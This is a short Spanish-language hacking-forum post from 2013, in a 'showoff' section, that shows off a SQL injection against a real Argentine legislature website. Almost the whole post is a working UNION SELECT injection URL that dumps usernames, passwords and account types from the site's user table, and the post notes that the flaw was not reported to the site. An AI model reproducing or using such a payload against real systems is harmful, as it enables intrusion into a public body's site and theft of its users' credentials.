Underc0de - Hacking y seguridad informática

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: hdbreaker en Junio 27, 2013, 06:10:55 pm

Título: SQLI http://www.legislatura.gov.ar/
Publicado por: hdbreaker en Junio 27, 2013, 06:10:55 pm
(http://i42.tinypic.com/24l97h2.png)

SQLI

Vector: http://www.legislatura.gov.ar/noti_ver.php?ver=267' union select 1,concat_ws(char(58),usu_nombre,usu_clave,usu_tipo),3,4,5,6,7,8,9,10,11%20from _usuarios-- -c
Reportado: NO